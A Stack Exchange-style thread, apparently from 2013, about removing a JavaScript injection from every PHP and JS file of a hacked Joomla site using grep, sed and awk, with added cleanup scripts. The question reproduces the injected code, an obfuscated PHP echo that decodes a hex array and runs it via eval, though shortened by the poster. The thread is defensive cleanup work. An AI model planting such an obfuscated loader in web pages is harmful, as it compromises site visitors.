
One of our old hosted Joomla sites suffered a JavaScript injection, and I'm going through cleaning it up. The following code was inserted into every .php or .js file:

<?
#0c0896#
echo " <script type=\"text/javascript\" language=\"javascript\" > bv=(5-3-1);aq=\"0\"+\"x\";sp=\"spli\"+\"t\";ff=String.fromCharCode;w=window;z=\"dy\";try{document[\"\x62o\"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,71,61,58,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}w=f;s=[];for(i=2-2;-i+1333!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script>";

#/0c0896#
?>

"exact syntax, though the actual code is MUCH longer, I cut a lot of hex from the middle to make it easier"

I am trying to use GREP and SED to do a find and replace on all files, and I don't think I have my syntax for SED quite right.

grep -rl "4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c" ./ | xargs sed -i 's/<?[.*]#0c0896#[.*]#\/0c0896#[.*]?>//g'

What I am going for here is to use grep to search all files for a snippet of the code, which is working, and then use SED to replace the tags #0c0896# and everything in between with nothing.

Matt Bear
  • Sed is line-based by default. Expressions are matched line by line. – Zoredache Jun 11 '13 at 20:17
  • I had the same JavaScript injection - lucky for me my site isn't that important or huge, so I manually remove it from time to time. Maybe it would help to `chmod` the files it injects (I `chmod 444` all php and js files). – Jul 14 '13 at 11:47

2 Answers


Sed is the wrong tool, because it only considers a line at a time.

Awk is a much better tool for taking action on content between two matching lines.

awk '/a/,/b/ { next } { print }'

will skip everything between lines that match regular expression a and regular expression b.

However, a more direct answer is that once a machine has been compromised, you can't trust anything on it. The only appropriate course of action for a professional sysadmin is to reinstall the machine from scratch.

200_success
  • This is a hosted GoDaddy site; I don't have any control over the server itself, just my directory. And it's a legacy site that I actually didn't even know existed until I was informed by a dev that it was compromised, so there are no backups. If it was one of my servers it would have been rebuilt from a clean backup immediately. (Actually it wouldn't even have been compromised like this to begin with.) – Matt Bear Jun 11 '13 at 20:35
  • Found the backups, btw... stored on the host, compromised also. I swear, the disaster planning and prevention plan before I got here involved someone's grandma and a bible. – Matt Bear Jun 11 '13 at 21:23
  • Then you should probably rebuild the site from scratch. Download Joomla and any add-ons (the same version as whatever was installed on your site) and diff the source code, file by file. As you go along, you'll learn about how the site was put together and all of its problems. – 200_success Jun 11 '13 at 23:53
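
The answer above gives the awk range idea; the script below is an added example (not code from the question or either answer) that turns it into a complete cleanup pass. Besides dropping the marker-to-marker range it also removes the lone "<?" and "?>" lines the injection wraps around its markers, so a cleaned .js file parses again, and it keeps a copy of every original, with its mtime, in a quarantine directory for later review. It assumes the marker strings and the grep signature are exactly the ones shown in the question and that each marker sits on its own line; the sample tree it builds for the demo is constructed, not the real payload.

```shell
#!/bin/sh
# Added example, not code from the original question or answers. Same idea as the
# awk range above, but it also removes the "<?" and "?>" lines the injection wraps
# around its markers, and keeps a copy of every original outside the site.
# Assumptions: marker strings exactly as in the question, one marker per line, and
# the grep signature is the hex fragment from the question.
set -u

START='#0c0896#'
END='#/0c0896#'
SIGNATURE='4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c'

# clean_stream: stdin -> stdout without the injected block(s)
clean_stream() {
    awk -v start="$START" -v end="$END" '
        { t = $0; sub(/^[ \t]+/, "", t); sub(/[ \t\r]+$/, "", t) }  # trimmed copy for matching
        held != "" {                     # previous line was a lone "<?": was it the wrapper?
            if (t == start) { held = ""; state = 1; next }          # yes: drop "<?" and the marker
            print held; held = ""                                   # no: legitimate PHP, keep it
        }
        state == 2 {                     # after the end marker: eat blank lines and the closing "?>"
            if (t == "") next
            state = 0
            if (t == "?>") next
        }
        state == 1 {                     # inside the block: drop everything up to the end marker
            if (t == end) state = 2
            next
        }
        t == "<?" { held = $0; next }    # hold a lone "<?" until we see what follows it
        { print }
        END { if (held != "") print held }
    '
}

# clean_file FILE QDIR: copy the original (keeping its mtime) to QDIR under the
# same relative path, then replace FILE with the cleaned version
clean_file() {
    f=$1
    q=$2
    case $f in */*) dir=${f%/*} ;; *) dir=. ;; esac
    mkdir -p -- "$q/$dir" && cp -p -- "$f" "$q/$f" || return 1
    clean_stream < "$f" > "$f.cleaning" && mv -- "$f.cleaning" "$f"
}

# clean_tree DIR QDIR: same file selection as the question's grep, without the
# xargs word-splitting. QDIR must lie outside DIR, or the quarantined copies are
# picked up again on the next run.
clean_tree() {
    grep -rlF -- "$SIGNATURE" "$1" | while IFS= read -r f; do
        clean_file "$f" "$2" && printf 'cleaned %s\n' "$f"
    done
}

# demo: constructed sample tree (stand-in payload, not the real one): one infected
# PHP file that also contains a legitimate "<? ... ?>" block, plus one clean JS file.
# Cleans it and prints the cleaned PHP file.
demo() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/site/js" "$d/quarantine"
    printf '%s\n' '<?' "$START" "echo \" <script>f='$SIGNATURE'</script>\";" '' "$END" '?>' \
        '<?' 'echo "legit";' '?>' 'function real() { return 1; }' > "$d/site/index.php"
    printf '%s\n' 'var clean = true;' > "$d/site/js/app.js"
    ( cd "$d/site" && clean_tree . "$d/quarantine" ) > /dev/null
    cat "$d/site/index.php"
    rm -rf -- "$d"
}

# Real use, from the site's document root: clean_tree ./ /some/dir/outside/the/site
```

After the run, diff the quarantine copies against the cleaned files before deleting anything; anything the cleaner touched that is not the marker block deserves a look, and the mtimes on the quarantined copies are the only timeline you have for when the injection landed.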

Instead of

<?[.*]#0c0896#[.*]#\/0c0896#[.*]?>

use

<?.*#0c0896#.*#\/0c0896#.*?>

A bracket expression matches only one single character, if that character is in the brackets. Also, inside a bracket expression, regex quantifiers and other special characters lose their meaning. The expression you provided means: match an open angle bracket, followed by a question mark, followed by either a dot or a star, followed by ...

Sed is line-oriented, so the .* in the above will not span across lines. Is the offending code on one line?

glenn jackman
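
The two points in the answer above (what `[.*]` really matches, and that `.*` never crosses a newline) are easy to check by running both expressions over constructed input. The script below is an added example, not from the answer or the question; the one-line "injection" it uses is a short stand-in for the real echo line, which is far longer.

```shell
#!/bin/sh
# Added example, not from the original answer: runs the question's sed expression
# and the corrected one over constructed input to show what each actually matches,
# and that the corrected one still needs the whole injection on a single line.

BRACKET='s/<?[.*]#0c0896#[.*]#\/0c0896#[.*]?>//g'   # the question's expression
PLAIN='s/<?.*#0c0896#.*#\/0c0896#.*?>//g'           # the answer's correction

# Constructed one-line stand-in for the injection (the real echo line is far longer)
ONE_LINE='<? #0c0896# echo "<script>bv=(5-3-1);</script>"; #/0c0896# ?> var keep = 1;'

# apply EXPR < input: run one sed substitution over stdin
apply() { sed -e "$1"; }

# The bracket expression wants exactly one "." or "*" between "<?" and the marker,
# so it leaves the realistic line alone ...
bracket_on_realistic() { printf '%s\n' "$ONE_LINE" | apply "$BRACKET"; }

# ... and only strips a line built out of literal dots and stars
bracket_on_dots_and_stars() { printf '%s\n' '<?*#0c0896#.#/0c0896#*?>' | apply "$BRACKET"; }

# The corrected expression removes the block when everything sits on one line,
# leaving only what followed the closing "?>"
plain_on_realistic() { printf '%s\n' "$ONE_LINE" | apply "$PLAIN"; }

# but sed sees one line at a time, so the multi-line layout from the question
# survives untouched: none of the five lines contains the whole pattern
plain_on_multiline() {
    printf '%s\n' '<?' '#0c0896#' 'echo "x";' '#/0c0896#' '?>' | apply "$PLAIN"
}
```

The last case is the one that matters for the files in the question: the markers and the echo are on separate lines, so even the corrected single-line expression does nothing to them.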